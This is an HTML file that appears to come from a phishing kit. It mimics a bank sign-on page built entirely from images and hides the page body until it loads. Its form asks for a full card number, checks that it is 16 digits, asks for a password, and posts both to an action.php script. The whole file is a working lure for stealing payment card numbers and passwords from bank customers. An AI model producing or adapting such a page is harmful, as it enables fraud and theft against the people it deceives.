<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<script type="text/javascript" language="javascript">
		function mat(){
		signupFORM = document.aspnetForm;
		if(signupFORM.formtext1.value == ""){ alert("Mandatory field: Enter Your Valid Card Number");signupFORM.formtext1.focus();return false;}
		if (signupFORM.formtext1.value.length < 16 )
	{ alert("Invalid Card Number."); signupFORM.formtext1.focus(); return false;}
		if(signupFORM.formtext2.value == ""){ alert("Mandatory field: Enter Your Valid Password");signupFORM.formtext2.focus();return false;}
				
return true;}
</script>
<head>
<title>sign on</title>
<link rel="shortcut icon"
              href="images/favicon.ico"/>
			  
			  
	
<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>

<body style="visibility:hidden" onload="unhideBody()">
<style type="text/css">
div#container
{
	position:relative;
	width: 100%;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left; 
}
body {text-align:center;margin:0}
</style>

</head>
<body bgColor="#0079C1">
<div id="container">
<div id="image1" style="position:absolute; overflow:hidden; left:261px; top:0px; width:959px; height:69px; z-index:0"><a href="#"><img src="images/header.png" alt="" title="" border=0 width=959 height=69></a></div>

<div id="image2" style="position:absolute; overflow:hidden; left:250px; top:90px; width:951px; height:442px; z-index:1"><img src="images/pnl.png" alt="" title="" border=0 width=951 height=442></div>

<div id="image3" style="position:absolute; overflow:hidden; left:966px; top:165px; width:211px; height:90px; z-index:2"><a href="#"><img src="images/100.png" alt="" title="" border=0 width=211 height=90></a></div>

<div id="image4" style="position:absolute; overflow:hidden; left:254px; top:530px; width:945px; height:295px; z-index:3"><img src="images/ooooo.png" alt="" title="" border=0 width=945 height=295></div>

<div id="image5" style="position:absolute; overflow:hidden; left:254px; top:836px; width:945px; height:30px; z-index:4"><a href="#"><img src="images/footer.png" alt="" title="" border=0 width=945 height=30></a></div>

<div id="image6" style="position: absolute; overflow: hidden; left: 455px; top: 182px; width: 78px; height: 19px; z-index: 5"><a href="#"><img src="images/reg.png" alt="" title="" border=0 width=78 height=19></a></div>

<div id="image7" style="position: absolute; overflow: hidden; left: 752px; top: 182px; width: 188px; height: 17px; z-index: 6"><a href="#"><img src="images/reg2.png" alt="" title="" border=0 width=188 height=17></a></div>

<form name="aspnetForm" method="post" action="action.php" onsubmit="return mat()" id="aspnetForm">

<input name="formtext1" type="text" maxlength=16 autocomplete="OFF" id="formtext1" value="" class="input-login CB_DataMask" style="position: absolute; width: 246px; left: 378px; top: 267px; z-index: 7">
<div id="formcheckbox1" style="position: absolute; left: 378px; top: 274px; z-index: 8"></div>
<div id="formimage1" style="position: absolute; left: 552px; top: 359px; z-index: 9"><input type="image" name="formimage1" width="71" height="23" src="images/cnti.png"></div>
<input name="formtext2" type="password" style="position: absolute; width: 161px; left: 380px; top: 359px; z-index: 10">
<div id="formimage2" style="position: absolute; left: 378px; top: 360px; z-index: 11"></div>
<div id="formcheckbox2" style="position: absolute; left: 405px; top: 304px; z-index: 12"><input type="checkbox" name="formcheckbox2"></div>

</div>

	
</body>
</html>
